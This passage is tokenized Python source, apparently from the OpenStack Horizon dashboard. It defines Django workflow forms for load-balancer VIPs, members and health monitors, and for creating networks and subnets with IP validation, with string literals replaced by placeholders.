= ( AddVipStep , ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT:name>' ) <EOL> return message % name <EOL> def handle ( self , request , context ) : <EOL> if context [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> context [ '<STR_LIT:address>' ] = context [ '<STR_LIT>' ] <EOL> else : <EOL> if not context [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . failure_message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> else : <EOL> context [ '<STR_LIT:address>' ] = context [ '<STR_LIT>' ] <EOL> try : <EOL> pool = api . lbaas . pool_get ( request , context [ '<STR_LIT>' ] ) <EOL> context [ '<STR_LIT>' ] = pool [ '<STR_LIT>' ] <EOL> except Exception : <EOL> context [ '<STR_LIT>' ] = None <EOL> self . failure_message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> if context [ '<STR_LIT>' ] : <EOL> stype = context [ '<STR_LIT>' ] <EOL> if stype == '<STR_LIT>' : <EOL> cookie = context [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = { '<STR_LIT:type>' : stype , <EOL> '<STR_LIT>' : cookie } <EOL> else : <EOL> context [ '<STR_LIT>' ] = { '<STR_LIT:type>' : stype } <EOL> else : <EOL> context [ '<STR_LIT>' ] = { } <EOL> try : <EOL> api . lbaas . vip_create ( request , ** context ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> class AddMemberAction ( workflows . Action ) : <EOL> pool_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> members = forms . MultipleChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = True , <EOL> initial = [ "<STR_LIT:default>" ] , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> error_messages = { '<STR_LIT>' : <EOL> _ ( '<STR_LIT>' ) } , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> weight = forms . IntegerField ( max_value = <NUM_LIT> , min_value = <NUM_LIT:0> , label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> protocol_port = forms . IntegerField ( label = _ ( "<STR_LIT>" ) , min_value = <NUM_LIT:1> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> validators = [ validators . validate_port_range ] ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddMemberAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> pool_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> pools = api . lbaas . pools_get ( request ) <EOL> except Exception : <EOL> pools = [ ] <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> pools = sorted ( pools , <EOL> key = lambda pool : pool . name ) <EOL> for p in pools : <EOL> pool_id_choices . append ( ( p . id , p . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = pool_id_choices <EOL> members_choices = [ ] <EOL> try : <EOL> servers , has_more = api . nova . server_list ( request ) <EOL> except Exception : <EOL> servers = [ ] <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> if len ( servers ) == <NUM_LIT:0> : <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> return <EOL> for m in servers : <EOL> members_choices . append ( ( m . id , m . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = sorted ( <EOL> members_choices , <EOL> key = lambda member : member [ <NUM_LIT:1> ] ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddMemberStep ( workflows . Step ) : <EOL> action_class = AddMemberAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddMemberStep , self ) . contribute ( data , context ) <EOL> return context <EOL> class AddMember ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddMemberStep , ) <EOL> def handle ( self , request , context ) : <EOL> for m in context [ '<STR_LIT>' ] : <EOL> params = { '<STR_LIT>' : m } <EOL> try : <EOL> plist = api . neutron . port_list ( request , ** params ) <EOL> except Exception : <EOL> return False <EOL> if plist : <EOL> context [ '<STR_LIT:address>' ] = plist [ <NUM_LIT:0> ] . fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . member_create ( <EOL> request , ** context ) . id <EOL> except Exception : <EOL> return False <EOL> return True <EOL> class AddMonitorAction ( workflows . Action ) : <EOL> type = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> choices = [ ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:http>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ] , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' <EOL> } ) ) <EOL> delay = forms . IntegerField ( <EOL> min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> timeout = forms . IntegerField ( <EOL> min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> max_retries = forms . IntegerField ( <EOL> max_value = <NUM_LIT:10> , min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> http_method = forms . ChoiceField ( <EOL> initial = "<STR_LIT:GET>" , <EOL> required = False , <EOL> choices = [ ( '<STR_LIT:GET>' , _ ( '<STR_LIT:GET>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> url_path = forms . CharField ( <EOL> initial = "<STR_LIT:/>" , <EOL> required = False , <EOL> max_length = <NUM_LIT> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> expected_codes = forms . RegexField ( <EOL> initial = "<STR_LIT>" , <EOL> required = False , <EOL> max_length = <NUM_LIT> , <EOL> regex = r'<STR_LIT>' , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddMonitorAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( AddMonitorAction , self ) . clean ( ) <EOL> type_opt = cleaned_data . get ( '<STR_LIT:type>' ) <EOL> if type_opt in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> http_method_opt = cleaned_data . get ( '<STR_LIT>' ) <EOL> url_path = cleaned_data . get ( '<STR_LIT>' ) <EOL> expected_codes = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not http_method_opt : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> if not url_path : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> if not expected_codes : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> return cleaned_data <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddMonitorStep ( workflows . Step ) : <EOL> action_class = AddMonitorAction <EOL> contributes = ( "<STR_LIT:type>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddMonitorStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddMonitor ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddMonitorStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_health_monitor_create ( <EOL> request , ** context ) . get ( '<STR_LIT:id>' ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False <EOL> class AddPMAssociationAction ( workflows . Action ) : <EOL> monitor_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddPMAssociationAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> def populate_monitor_id_choices ( self , request , context ) : <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % context [ '<STR_LIT>' ] ) <EOL> monitor_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> monitors = api . lbaas . pool_health_monitors_get ( request ) <EOL> for m in monitors : <EOL> if m . id not in context [ '<STR_LIT>' ] : <EOL> monitor_id_choices . append ( ( m . id , m . id ) ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = monitor_id_choices <EOL> return monitor_id_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" ) <EOL> class AddPMAssociationStep ( workflows . Step ) : <EOL> action_class = AddPMAssociationAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT>" , ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddPMAssociationStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddPMAssociation ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddPMAssociationStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_monitor_association_create ( <EOL> request , ** context ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False <EOL> class DeletePMAssociationAction ( workflows . Action ) : <EOL> monitor_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( DeletePMAssociationAction , self ) . __init__ ( <EOL> request , * args , ** kwargs ) <EOL> def populate_monitor_id_choices ( self , request , context ) : <EOL> self . fields [ '<STR_LIT>' ] . label = ( _ ( "<STR_LIT>" ) % <EOL> context [ '<STR_LIT>' ] ) <EOL> monitor_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> for m_id in context [ '<STR_LIT>' ] : <EOL> monitor_id_choices . append ( ( m_id , m_id ) ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = monitor_id_choices <EOL> return monitor_id_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" ) <EOL> class DeletePMAssociationStep ( workflows . Step ) : <EOL> action_class = DeletePMAssociationAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT>" , ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( DeletePMAssociationStep , self ) . contribute ( <EOL> data , context ) <EOL> if data : <EOL> return context <EOL> class DeletePMAssociation ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( DeletePMAssociationStep , ) <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . pool_monitor_association_delete ( <EOL> request , ** context ) <EOL> return True <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( "<STR_LIT>" ) ) <EOL> return False </s>
<s> import logging <EOL> import netaddr <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from horizon . utils import fields <EOL> from horizon import workflows <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class CreateNetworkInfoAction ( workflows . Action ) : <EOL> net_name = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> net_profile_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> admin_state = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( CreateNetworkInfoAction , self ) . __init__ ( request , <EOL> * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . choices = ( <EOL> self . get_network_profile_choices ( request ) ) <EOL> def get_network_profile_choices ( self , request ) : <EOL> profile_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for profile in self . _get_profiles ( request , '<STR_LIT>' ) : <EOL> profile_choices . append ( ( profile . id , profile . name ) ) <EOL> return profile_choices <EOL> def _get_profiles ( self , request , type_p ) : <EOL> try : <EOL> profiles = api . neutron . profile_list ( request , type_p ) <EOL> except Exception : <EOL> profiles = [ ] <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg ) <EOL> return profiles <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class CreateNetworkInfo ( workflows . Step ) : <EOL> action_class = CreateNetworkInfoAction <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateSubnetInfoAction ( workflows . Action ) : <EOL> with_subnet = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> subnet_name = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> cidr = fields . IPField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> initial = "<STR_LIT>" , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> version = fields . IPv4 | fields . IPv6 , <EOL> mask = True ) <EOL> ip_version = forms . ChoiceField ( choices = [ ( <NUM_LIT:4> , '<STR_LIT>' ) , ( <NUM_LIT:6> , '<STR_LIT>' ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> gateway_ip = fields . IPField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> initial = "<STR_LIT>" , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> version = fields . IPv4 | fields . IPv6 , <EOL> mask = False ) <EOL> no_gateway = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _check_subnet_data ( self , cleaned_data , is_create = True ) : <EOL> cidr = cleaned_data . get ( '<STR_LIT>' ) <EOL> ip_version = int ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> gateway_ip = cleaned_data . get ( '<STR_LIT>' ) <EOL> no_gateway = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not cidr : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if cidr : <EOL> subnet = netaddr . IPNetwork ( cidr ) <EOL> if subnet . version != ip_version : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if ( ip_version == <NUM_LIT:4> and subnet . prefixlen == <NUM_LIT:32> ) or ( ip_version == <NUM_LIT:6> and subnet . prefixlen == <NUM_LIT> ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> % subnet . prefixlen ) <EOL> raise forms . ValidationError ( msg ) <EOL> if not no_gateway and gateway_ip : <EOL> if netaddr . IPAddress ( gateway_ip ) . version is not ip_version : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> if not is_create and not no_gateway and not gateway_ip : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise forms . ValidationError ( msg ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateSubnetInfoAction , self ) . clean ( ) <EOL> with_subnet = cleaned_data . get ( '<STR_LIT>' ) <EOL> if not with_subnet : <EOL> return cleaned_data <EOL> self . _check_subnet_data ( cleaned_data ) <EOL> return cleaned_data <EOL> class CreateSubnetInfo ( workflows . Step ) : <EOL> action_class = CreateSubnetInfoAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateSubnetDetailAction ( workflows . Action ) : <EOL> enable_dhcp = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> allocation_pools = forms . CharField ( <EOL> widget = forms . Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> dns_nameservers = forms . CharField ( <EOL> widget = forms . widgets . Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> host_routes = forms . CharField ( <EOL> widget = forms . widgets . Textarea ( ) , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> required = False ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> help_text = _ ( '<STR_LIT>' ) <EOL> def _convert_ip_address ( self , ip , field_name ) : <EOL> try : <EOL> return netaddr . IPAddress ( ip ) <EOL> except ( netaddr . AddrFormatError , ValueError ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' % dict ( <EOL> field_name = field_name , ip = ip ) ) <EOL> raise forms . ValidationError ( msg ) <EOL> def _convert_ip_network ( self , network , field_name ) : <EOL> try : <EOL> return netaddr . IPNetwork ( network ) <EOL> except ( netaddr . AddrFormatError , ValueError ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' % dict ( <EOL> field_name = field_name , network = network ) ) <EOL> raise forms . ValidationError ( msg ) <EOL> def _check_allocation_pools ( self , allocation_pools ) : <EOL> for p in allocation_pools . split ( '<STR_LIT:\n>' ) : <EOL> p = p . strip ( ) <EOL> if not p : <EOL> continue <EOL> pool = p . split ( '<STR_LIT:U+002C>' ) <EOL> if len ( pool ) != <NUM_LIT:2> : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % p <EOL> raise forms . ValidationError ( msg ) <EOL> start , end = [ self . _convert_ip_address ( ip , "<STR_LIT>" ) <EOL> for ip in pool ] <EOL> if start > end : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % p <EOL> raise forms . ValidationError ( msg ) <EOL> def _check_dns_nameservers ( self , dns_nameservers ) : <EOL> for ns in dns_nameservers . split ( '<STR_LIT:\n>' ) : <EOL> ns = ns . strip ( ) <EOL> if not ns : <EOL> continue <EOL> self . _convert_ip_address ( ns , "<STR_LIT>" ) <EOL> def _check_host_routes ( self , host_routes ) : <EOL> for r in host_routes . split ( '<STR_LIT:\n>' ) : <EOL> r = r . strip ( ) <EOL> if not r : <EOL> continue <EOL> route = r . split ( '<STR_LIT:U+002C>' ) <EOL> if len ( route ) != <NUM_LIT:2> : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % r <EOL> raise forms . ValidationError ( msg ) <EOL> self . _convert_ip_network ( route [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . _convert_ip_address ( route [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateSubnetDetailAction , self ) . clean ( ) <EOL> self . _check_allocation_pools ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> self . _check_host_routes ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> self . _check_dns_nameservers ( cleaned_data . get ( '<STR_LIT>' ) ) <EOL> return cleaned_data <EOL> class CreateSubnetDetail ( workflows . Step ) : <EOL> action_class = CreateSubnetDetailAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> class CreateNetwork ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> default_steps = ( CreateNetworkInfo , <EOL> CreateSubnetInfo , <EOL> CreateSubnetDetail ) <EOL> def get_success_url ( self ) : <EOL> return reverse ( "<STR_LIT>" ) <EOL> def get_failure_url ( self ) : <EOL> return reverse ( "<STR_LIT>" ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT>' ) or self . context . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return message % name <EOL> def _create_network ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> network = api . neutron . network_create ( request , ** params ) <EOL> network . set_id_as_name_if_empty ( ) <EOL> self . context [ '<STR_LIT>' ] = network . id <EOL> msg = _ ( '<STR_LIT>' ) % network . name <EOL> LOG . debug ( msg ) <EOL> return network <EOL> except Exception as e : <EOL> msg = ( _ ( '<STR_LIT>' ) % <EOL> { "<STR_LIT>" : data [ '<STR_LIT>' ] , "<STR_LIT>" : e } ) <EOL> LOG . info ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> return False <EOL> def _setup_subnet_parameters ( self , params , data , is_create = True ) : <EOL> """<STR_LIT>""" <EOL> is_update = not is_create <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> if is_create and data [ '<STR_LIT>' ] : <EOL> pools = [ dict ( zip ( [ '<STR_LIT:start>' , '<STR_LIT:end>' ] , pool . strip ( ) . split ( '<STR_LIT:U+002C>' ) ) ) <EOL> for pool in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if pool . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = pools <EOL> if data [ '<STR_LIT>' ] or is_update : <EOL> routes = [ dict ( zip ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> route . strip ( ) . split ( '<STR_LIT:U+002C>' ) ) ) <EOL> for route in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if route . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = routes <EOL> if data [ '<STR_LIT>' ] or is_update : <EOL> nameservers = [ ns . strip ( ) <EOL> for ns in data [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> if ns . strip ( ) ] <EOL> params [ '<STR_LIT>' ] = nameservers <EOL> def _create_subnet ( self , request , data , network = None , tenant_id = None , <EOL> no_redirect = False ) : <EOL> if network : <EOL> network_id = network . id <EOL> network_name = network . name <EOL> else : <EOL> network_id = self . context . get ( '<STR_LIT>' ) <EOL> network_name = self . context . get ( '<STR_LIT>' ) <EOL> try : <EOL> params = { '<STR_LIT>' : network_id , <EOL> '<STR_LIT:name>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : int ( data [ '<STR_LIT>' ] ) } <EOL> if tenant_id : <EOL> params [ '<STR_LIT>' ] = tenant_id <EOL> if data [ '<STR_LIT>' ] : <EOL> params [ '<STR_LIT>' ] = None <EOL> elif data [ '<STR_LIT>' ] : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> self . _setup_subnet_parameters ( params , data ) <EOL> subnet = api . neutron . subnet_create ( request , ** params ) <EOL> self . context [ '<STR_LIT>' ] = subnet . id <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT>' ] <EOL> LOG . debug ( msg ) <EOL> return subnet <EOL> except Exception as e : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if no_redirect : <EOL> redirect = None <EOL> else : <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , <EOL> msg % { "<STR_LIT>" : data [ '<STR_LIT>' ] , "<STR_LIT>" : network_name , <EOL> "<STR_LIT>" : e } , <EOL> redirect = redirect ) <EOL> return False <EOL> def _delete_network ( self , request , network ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> api . neutron . network_delete ( request , network . id ) <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % network . name <EOL> LOG . debug ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> messages . info ( request , msg ) <EOL> raise exceptions . Http302 ( redirect ) <EOL> except Exception : <EOL> msg = _ ( 